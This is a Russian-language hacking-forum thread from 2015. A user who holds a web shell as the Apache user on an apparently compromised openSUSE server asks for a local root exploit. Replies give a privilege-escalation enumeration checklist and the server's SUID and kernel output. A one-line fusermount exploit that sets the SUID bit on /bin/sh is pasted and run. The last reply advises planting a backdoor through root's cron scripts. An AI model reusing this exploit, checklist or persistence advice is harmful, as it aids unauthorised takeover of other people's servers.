Bezlishke
16.07.2015, 14:16
Тут будем друг-другу помогать.
Я имею:
Apache
Linux halfquake 3.16.7-7-default #1 SMP Wed Dec 17 18:00:44 UTC 2014 (762f27a) x86_64
uid=30(wwwrun) gid=8(www) groups=8(www)
Я хочу
uid=0 gid=0 groups=0
НЕ могу найти LRE. ТАк же имеетя логпасс от мускуля.
А что вообще пробовали, какие сплойты? Что за ОС?
Bezlishke
17.07.2015, 09:26
Дело в том, что не могу найти подходящий под версию Local сплоит, для бэкконнекта тоже. Это дичь, какая-то.
Bezlishke
19.07.2015, 09:02
↑ (https://antichat.live/posts/3870055/)
Умерьте свое ЧСВ, каков вопрос -таков и ответ. Если лень почитать грамотное оформление подобных вопросов ,то и помощи не ждите.
Вы немного ошиблись. ЧСВ тут не причём, дело в том, что многие oldFAGS думают, что каждый человек с регой позже 14-го года с iq одноклеточного.
↑ (https://antichat.live/posts/3870055/)
/threads/296327/ (https://antichat.live/threads/296327/)
Довожу до вас, что мы- новореги с мозгом хлебушка, можем почувстовать свободу постинга только в песочнице. По сему тема и создана.
Вспасибо за ваше внимание.
Bezlishke
19.07.2015, 09:06
↑ (https://antichat.live/posts/3870057/)
Что по вашему актуальный? На котором написано "aktualmij dlya Linux halfquake 3.16.7-7-default #1 SMP Wed Dec 17 18:00:44 UTC 2014 (762f27a) x86_64" вот так?
Сделайте себя немножко уважать вашего собеседника, господин модератор. Актуальный, тот который будет способен работать при совокупности условий обусловленных ОС таргета.
Актуальный, тот который будет способен работать при совокупности условий обусловленных ОС таргета.
И какие же условия вы применили что у вас за 1.5 года не подошел ни один сплоент? Какой логикой вы руководствовались при выборе сплоента?
↑ (https://antichat.live/posts/3870058/)
Довожу до вас, что мы- новореги с мозгом хлебушка, можем почувстовать свободу постинга только в песочнице. По сему тема и создана.
Вспасибо за ваше внимание.
Прекрасно осведомлен,для чего создана песочница, под ваш вопрос О ПОДНЯТИИ ПРАВ нужно оформить тему данным образом,как я привел по ссылке выше.Для не новичков,ваш вопрос похож на "вот есть какой-то сервер у меня,как поднять права".
↑ (https://antichat.live/posts/3870058/)
что многие oldFAGS думают, что каждый человек с регой позже 14-го года с iq одноклеточного.
Они не думают,они просто читают вопрос и сразу видят,что человек сделал сам,а что пытается просто перебросить на других
Сделайте вывод следующих команд
uname -a
ls -la /boot
lls -la --full-time /lib (или /lib64)
mount
df -h
cat /etc/issue
cat /etc/crontab (ls -la cron.d, cron.hourly, cron.monthly, cron.weekly) + вывод содержимого каждого файла из этих директорий.
cat /proc/version
cat /proc/sys/vm/mmap_min_addr
pwd
ls -la /usr/bin/staprun
find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
Так же обязательно писать всё, что вы пробовали для повышения привилегий, какие возникли ошибки.
Bezlishke
19.07.2015, 10:06
↑ (https://antichat.live/posts/3870062/)
1.5 года
Откуда такие цифры?
↑ (https://antichat.live/posts/3870062/)
И какие же условия вы применили
Перечитайте и поправьте логические ошибки.
↑ (https://antichat.live/posts/3870062/)
Какой логикой вы руководствовались при выборе сплоента?
1) Описание и комментарии автора.
2) Соответсвие версии (она должна быть не меннее указанной на сервере)
Я перерыл багтрекеры Дебиана, Сусей, Убунты, Арча. Судя по найденной информации багфиксы были и по уязвимостым прошлых версий.
↑ (https://antichat.live/posts/3870063/)
Сделайте вывод следующих команд
.SpoilerTarget" type="button">Spoiler: uname -a
Linux halfquake 3.16.7-7-default #1 SMP Wed Dec 17 18:00:44 UTC 2014 (762f27a) x86_64 x86_64 x86_64 GNU/Linux
.SpoilerTarget" type="button">Spoiler: ls -la /boot
total 49957
drwxr-xr-x 5 root root 1024 Feb 6 11:40 .
drwxr-xr-x 22 root root 4096 Feb 6 13:41 ..
-rw-r--r-- 1 root root 65 Dec 17 2014 .vmlinuz-3.16.7-7-default.hmac
-rw-r--r-- 1 root root 2912183 Dec 17 2014 System.map-3.16.7-7-default
-rw-r--r-- 1 root root 512 Oct 10 2014 backup_mbr
-rw-r--r-- 1 root root 1484 Oct 22 2014 boot.readme
-rw-r--r-- 1 root root 148363 Dec 17 2014 config-3.16.7-7-default
drwxr-xr-x 2 root root 1024 Nov 27 2014 dracut
drwxr-xr-x 7 root root 1024 Feb 6 11:40 grub2
lrwxrwxrwx 1 root root 23 Dec 22 2014 initrd -> initrd-3.16.7-7-default
-rw------- 1 root root 35745308 Feb 6 11:40 initrd-3.16.7-7-default
drwx------ 2 root root 12288 Oct 10 2014 lost+found
-rw-r--r-- 1 root root 309712 Dec 17 2014 symvers-3.16.7-7-default.gz
-rw-r--r-- 1 root root 409 Dec 17 2014 sysctl.conf-3.16.7-7-default
-rw-r--r-- 1 root root 6378104 Dec 17 2014 vmlinux-3.16.7-7-default.gz
lrwxrwxrwx 1 root root 24 Dec 22 2014 vmlinuz -> vmlinuz-3.16.7-7-default
-rw-r--r-- 1 root root 5427272 Dec 17 2014 vmlinuz-3.16.7-7-default
.SpoilerTarget" type="button">Spoiler: lls -la --full-time /lib и lls -la --full-time /lib64
Оба варианта не дали выхлопа
.SpoilerTarget" type="button">Spoiler: mount
/dev/md2 on / type ext4 (rw,relatime,data=ordered)
rpc_pipefs on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw,relatime)
devtmpfs on /dev type devtmpfs (rw,nosuid,size=8168852k,nr_inodes=2042213,mode=75 5)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode =000)
mqueue on /dev/mqueue type mqueue (rw,relatime)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
proc on /proc type proc (rw,relatime)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=27,pgrp=1,timeout=300,minproto=5,m axproto=5,direct)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_age nt=/usr/lib/systemd/systemd-cgroups-agent,name=systemd)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
tmpfs on /run type tmpfs (rw,nosuid,nodev,mode=755)
/dev/md1 on /boot type ext3 (rw,relatime,stripe=4,data=ordered)
/dev/md3 on /home type ext4 (rw,relatime,data=ordered)
/dev/md2 on /tmp type ext4 (rw,relatime,data=ordered)
/dev/md2 on /var/tmp type ext4 (rw,relatime,data=ordered)
.SpoilerTarget" type="button">Spoiler: df -h
Filesystem Size Used Avail Use% Mounted on
/dev/md2 1008G 23G 935G 3% /
devtmpfs 7.8G 0 7.8G 0% /dev
tmpfs 7.9G 0 7.9G 0% /dev/shm
tmpfs 7.9G 0 7.9G 0% /sys/fs/cgroup
tmpfs 7.9G 1.7M 7.9G 1% /run
/dev/md1 488M 58M 405M 13% /boot
/dev/md3 1.7T 1.6G 1.7T 1% /home
.SpoilerTarget" type="button">Spoiler: cat /etc/issue
Welcome to openSUSE 13.2 "Harlequin" - Kernel \r (\l).
.SpoilerTarget" type="button">Spoiler: cat /etc/crontab (ls -la cron.d, cron.hourly, cron.monthly, cron.weekly)
Не дало выхлопа. Ничего.
.SpoilerTarget" type="button">Spoiler: cat /proc/version
Linux version 3.16.7-7-default (geeko@buildhost) (gcc version 4.8.3 20140627 [gcc-4_8-branch revision 212064] (SUSE Linux) ) #1 SMP Wed Dec 17 18:00:44 UTC 2014 (762f27a)
.SpoilerTarget" type="button">Spoiler: cat /proc/sys/vm/mmap_min_addr
65536
.SpoilerTarget" type="button">Spoiler: pwd
/srv/www/htdocs/iad/forum/adm/images
.SpoilerTarget" type="button">Spoiler: ls -la /usr/bin/staprun
Не дало выхлопа
.SpoilerTarget" type="button">Spoiler: find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rwsr-xr-x 1 root root 114912 Sep 29 2014 /sbin/mount.nfs
-rwsr-xr-x 1 root shadow 35560 Sep 25 2014 /sbin/unix_chkpwd
-rwsr-xr-x 1 root shadow 62976 Sep 25 2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 26656 Jan 13 2015 /usr/bin/pkexec
-rwsr-xr-x 1 root shadow 41400 Sep 25 2014 /usr/bin/chsh
-rwsr-xr-x 1 root shadow 63368 Sep 25 2014 /usr/bin/chage
-rwsr-xr-x 1 root shadow 50584 Sep 25 2014 /usr/bin/chfn
-rwsr-xr-x 1 root root 31680 Jan 8 2015 /usr/bin/umount
-rwsr-xr-x 1 root shadow 51200 Sep 25 2014 /usr/bin/passwd
-rwsr-xr-x 1 root root 31808 Jan 8 2015 /usr/bin/su
-rwsr-xr-x 1 root root 40128 Jan 8 2015 /usr/bin/mount
-rwsr-xr-x 1 root shadow 19272 Sep 25 2014 /usr/bin/expiry
-rwsr-xr-x 1 root root 36632 Sep 25 2014 /usr/bin/newgrp
-rwsr-xr-x 1 root trusted 55944 Oct 6 2014 /usr/bin/crontab
-rwsr-xr-x 1 root root 155112 Oct 8 2014 /usr/bin/sudo
-rwsr-xr-x 1 root root 14376 Jan 13 2015 /usr/lib/polkit-1/polkit-agent-helper-1
-rwsr-x--- 1 root messagebus 294560 Jan 22 14:54 /lib/dbus-1/dbus-daemon-launch-helper
grimnir (https://antichat.live/members/197111/), прошу прощения за то, что допустил ошибку оформления. Это первый в моей жизни подобный вопрос. Первый блин всегда комом. Надеюсь это достаточная информация.
Откуда такие цифры?
Ошибся, пол года ядру. Изучите карту https://rdot.org/forum/showthread.php?t=1860 проверяйте
Bezlishke
19.07.2015, 10:47
↑ (https://antichat.live/posts/3870069/)
Ошибся, пол года ядру. Изучите карту
https://rdot.org/forum/showthread.php?t=1860
проверяйте
К сожалению не могу увидеть нужной мне версии (По моему мнению)
https://rdot.org/forum/showthread.php?t=3440 может это?
Bezlishke
19.07.2015, 11:25
↑ (https://antichat.live/posts/3870077/)
https://rdot.org/forum/showthread.php?t=3440
может это?
Вроде выполнил
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a
Но ничего так и не получил.
Но ничего так и не получил.
Ты бы комментарии почитал на форуме к сплоенту
При логине root поставит suid-бит для /bin/sh.
ждать захода рута и ждать пока он увидит ошибки вообще не айс, делаем ps aux / ищем всякие bash скрипты в кроне и вместо /etc/bash.bashrc пишем туда запуск нашего бекдора = profit
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot